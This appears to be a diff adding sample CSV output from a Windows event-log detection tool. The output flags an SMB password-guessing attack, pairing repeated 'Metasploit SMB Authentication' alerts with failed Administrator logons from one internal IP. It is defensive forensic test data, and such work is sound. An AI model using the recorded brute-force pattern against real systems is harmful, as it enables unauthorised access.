+2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AzS4xRnHKxSwz5sZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v0hA1XvRIlqwKG6g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mKXKkvlHvjRh33Vw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JIMTGRC5IQlkrG9c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NYcLsxwbg8LkGCuQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kmttijRBtXqEbU0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXC3hYI1Gin59gvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hQiozAIr9Jgklmks  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O598IvZRpbdU1liO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xlmYWrAnn3sUNSRk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aAAkO0uOGIq8zVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 26K4BIpgUbBNWbDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: moW3Ts7edqoQ9XeU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8C4d3xE0QkWywbf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K1EgYFhtgrcjtcXM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7avpgQeA0KCIme9Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YFgmt3OEw4cDfPhG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OqITdE5K63nJg9tg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zBs4fYCiprxgDd43  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtBD0Q2szeURxMYA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KPUi2NhPP92Rs3hy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PrbMf9E0fOuwIB8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 807zsxQ9WETO9YIp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGMJKRYUlmijJV40  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xv33to031A0fQzX2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IT0bzycur7HXFeLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kyY2K7tT0HgQ1ZL3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6aexuFPH6FyEZ1bN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o8Iojas6sznqlYUE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U2SnliYkmx59ACSM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2plWY1GZHilHv5Vh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XIfmqihMJdPVz80p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Odg692Eyde8md0t7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gsQNvf5HkRQnbDul  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: il2DGq3bzfwGuJN4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9OsQFOcIyougrx0E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gR8wpQrGYzd4NrBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KFjRsjWXbEPs9m1I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wbjudOy3rWefzAIv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Q4gc8keCTv2HeE3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SmsaxHrHYuofUhAH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CvhWasTJYmChfsNU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DszGfEo9aua2y5UC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lZPScjxczbrcJuvJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucpjxJV4rBXOxy4e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
